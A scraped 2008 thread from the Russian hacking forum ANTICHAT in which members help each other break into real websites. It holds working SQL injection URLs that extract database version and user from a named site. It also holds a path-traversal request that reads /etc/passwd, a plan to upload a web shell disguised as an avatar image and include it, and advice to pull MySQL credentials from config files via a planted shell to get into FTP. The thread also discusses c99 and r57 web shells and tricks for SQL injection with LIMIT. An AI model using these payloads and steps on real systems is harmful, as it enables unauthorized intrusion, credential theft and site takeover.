HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.08.2008, 11:15
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию

Цитата:
Сообщение от softrix  
Залил шелл, но все папки и файлы кромер upload read-only, chmod не меняет права доступа.
Т.е. все файлы читать можно, но вот переписать, удалить или перезалить шел в другую папку не выходит.

Можно ли как-то снять защиту от записи на файлах?
узнай пароль от мускула .. попробуй подключится через фтп, если получится будут все папки доступны на запись
 
Ответить с цитированием

  #2  
Старый 29.08.2008, 12:49
softrix
Новичок
Регистрация: 05.07.2008
Сообщений: 16
С нами: 9395645

Репутация: 7
По умолчанию

Цитата:
Сообщение от nicusor  
узнай пароль от мускула .. попробуй подключится через фтп, если получится будут все папки доступны на запись
Хм, а как через мускул, можно пароль к фтп узнать ?
 
Ответить с цитированием

  #3  
Старый 29.08.2008, 16:22
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию

Цитата:
Сообщение от softrix  
Хм, а как через мускул, можно пароль к фтп узнать ?
не через мускул, а через шелл который ты уже залил, читаешь файлы пхп смотришь конфиги для мускула. может быть тебе повезёт и пароль подойдёт к фтп.
 
Ответить с цитированием

  #4  
Старый 29.08.2008, 14:07
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами: 9574565

Репутация: 712


По умолчанию

Помогите плизз:

Код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*
С SQL-Inj мало работал(
 
Ответить с цитированием

  #5  
Старый 29.08.2008, 16:02
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Цитата:
Сообщение от geforse  
Помогите плизз:

Код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*
С SQL-Inj мало работал(
1. Вот:

Код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=2095'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(concat(version(),char(58),user()))),11,12--+
2. Постить в тему с SQL инъекциями, то что ты запостил - не следовало, это не SQL инъекция - это издевательство, да и тема та не для вопросов (ну за это ты уже словил минус).

3. Прочитай хотя бы одну статью про SQL инъекции и не смеши людей.
 
Ответить с цитированием

  #6  
Старый 29.08.2008, 16:39
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию

Цитата:
Сообщение от geforse  
Помогите плизз:

Код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*
С SQL-Inj мало работал(
Немного покопался я....

PHP код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=-2095'+union+select+1,2,3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78),11,12+from+cms_site_comments/* 
если пойти дальше, можно найти читалку файлов...

PHP код:
http://www.freedancer.ru/?module=../../../../../../../../etc/passwd%00&cmd=list&dt=2 
как видно magic_quotes_gpc = Off, что очень радует!

Далее регаемся, заливаем картинку с телом шелла в автару, путь будет примерно такой:

Цитата:
/home/www/stussy/freedancer/cache/avatars/image.jpg
С помощью читалки ищем дырку в каком нить скрипте, где будет возможен инклуд и инклудим сам шелл....

вот и все =)
 
Ответить с цитированием

  #7  
Старый 29.08.2008, 18:55
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию

такая фигня. взломал сайт, залил туда шелл (мадшелл с99). а он не показывает некоторые файлы =/

выполнял комманду ls -la - показывает все файлы (r57 показывает все)

с чем это может быть связано?
 
Ответить с цитированием

  #8  
Старый 30.08.2008, 19:49
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами: 9981026

Репутация: 728
По умолчанию

Недавно при проведении скуль-инъекции возникла такая проблема - например, когда делаешь следующий запрос
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users/*
Скрипт выдает рандомное имя юзера из таблы, но стоит начать использовать лимит -
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+0,1/* или
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+1,1/*
То облом - скрипт ничего не выдает И так со всеми таблицами, что можно в таком случае сделать ?
 
Ответить с цитированием

  #9  
Старый 31.08.2008, 02:06
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
С нами: 9367310

Репутация: 52
По умолчанию

Цитата:
Сообщение от 0nep@t0p  
2 jokester
Нет, там точно не на запятую ибо из информэйшн схема тэиблс все норм перебиралось лимитом, а вот из других табл уже облом
Линк кинул в пм
попробуй в запрос дописать +where+1=1, т.е. он будет примерно таким : www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+where+1=1+l imit+1,1/*
 
Ответить с цитированием

  #10  
Старый 30.08.2008, 19:58
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

0nep@t0p
limit+1+offset+1
Видел как то фильтрацию "," точнее не фильтрацию, конечно , но неадекватную реакцию на неё именно в лимите

Если нет, кинь линк в ПМ посмотрим
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...